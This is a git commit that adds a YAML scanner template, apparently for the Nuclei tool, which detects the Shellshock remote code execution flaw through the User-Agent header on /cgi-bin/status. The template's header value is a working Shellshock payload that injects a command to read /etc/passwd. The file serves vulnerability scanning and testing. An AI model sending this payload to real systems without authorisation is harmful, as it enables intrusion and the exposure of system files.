Merge pull request #127 from xElkomy/patch-1

Create rce-shellshock-user-agent.yaml
2020-05-28 21:07:54 +05:30 · 2020-05-28 21:07:54 +05:30 · 8b2bc8ab8e
parent 386b4b0f07 b390ffa076
commit 8b2bc8ab8e
1 changed files with 19 additions and 0 deletions
--- a/vulnerabilities/rce-shellshock-user-agent.yaml
+++ b/vulnerabilities/rce-shellshock-user-agent.yaml
@ -0,0 +1,19 @@
+id: rce-user-agent-shell-shock
+
+info:
+ name: Remote Code Execution Via (User-Agent)
+ author: 0xelkomy
+ severity: high
+
+requests:
+ - method: GET
+   headers:
+    User-Agent: "{ :;}; echo $(</etc/passwd)"
+   path:
+    - "{{BaseURL}}/cgi-bin/status"
+   matchers:
+    - type: word
+      words:
+       - "/bin/sh"
+       - "/bin/bash"
+      part: body